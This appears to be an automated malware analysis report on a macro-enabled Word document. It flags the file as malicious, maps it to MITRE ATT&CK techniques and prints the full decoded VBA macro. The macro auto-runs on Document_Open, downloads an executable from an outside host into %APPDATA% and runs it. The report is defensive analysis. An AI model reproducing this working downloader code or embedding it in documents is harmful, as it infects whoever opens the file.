Verdict: MALICIOUS (risk score 98)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
T1203 Exploitation for Client Execution
The sample contains a VBA macro with a Document_Open auto-execution subroutine. This macro utilizes URLDownloadToFileW to download a second-stage executable from http://firefly.fireflyproduce.xyz/install/data/test1.exe and saves it as %APPDATA%\test.exe. Subsequently, it uses ShellExecuteW to execute the downloaded file, indicating a downloader or dropper functionality.
Heuristics (5)

- VBA project inside OOXML (medium, 3 related findings), rule OOXML_VBA: the document contains a VBA project; VBA macros are present.
- URLDownloadToFile in VBA (critical), rule OLE_VBA_DOWNLOAD: URLDownloadToFile in VBA. Matched lines in script:

```vba
'Macro Name: wWefqPnB
Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long
Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long
```

- Document_Open macro (low), rule OLE_VBA_DOCOPEN: Document_Open macro. Matched lines in script:

```vba
Attribute VB_Customizable = True
Private Sub Document_Open()
wWefqPnB
```

- Environ() call (env variable access) (low), rule OLE_VBA_ENVIRON: Environ() call (env variable access). Matched lines in script:

```vba
FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe"
kQscOcjq = Environ("APPDATA") & "\test.exe"
Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0)
```

- Embedded URL (info), rule EMBEDDED_URL: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://firefly.fireflyproduce.xyz/install/data/test1.exe (referenced by macro)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1199 bytes | c11e1f769b88ac2f702fc508ab8ce0d53da5570766c75d2948271c0e0d8f1e2b |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes | 551affe3abb05c04429907bb3cd926889084a4f97c75446f5471118565d366ac |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
wWefqPnB
End Sub
Attribute VB_Name = "Module1"
Option Explicit
'Macro Name: wWefqPnB
Private Declare Function bSMADket Lib "urlmon" Alias "URLDownloadToFileW" (ByVal GNtVQFWk As Long, ByVal lIbqcaOc As Long, ByVal eZSbThdG As Long, ByVal JUAwgCUx As Long, ByVal pQiRtXMp As Long) As Long
Private Declare Function ULPlGsEh Lib "shell32.dll" Alias "ShellExecuteW" (ByVal zGxGTNvZ As Long, ByVal sXorKUKC As Long, ByVal XSWMXpCu As Long, ByVal COEhkKtm As Long, ByVal hJlCxfld As Long, ByVal METXKAdV As Long) As Long
Public Sub wWefqPnB()
Dim FVKIBHsz As String, kQscOcjq As String
FVKIBHsz = "http://firefly.fireflyproduce.xyz/install/data/test1.exe"
kQscOcjq = Environ("APPDATA") & "\test.exe"
Call bSMADket(0, StrPtr(FVKIBHsz), StrPtr(kQscOcjq), 0, 0)
Call ULPlGsEh(0, StrPtr("Open"), StrPtr(kQscOcjq), 0, 0, 1)
End Sub
Private Sub Document_Open()
wWefqPnB
End Sub
```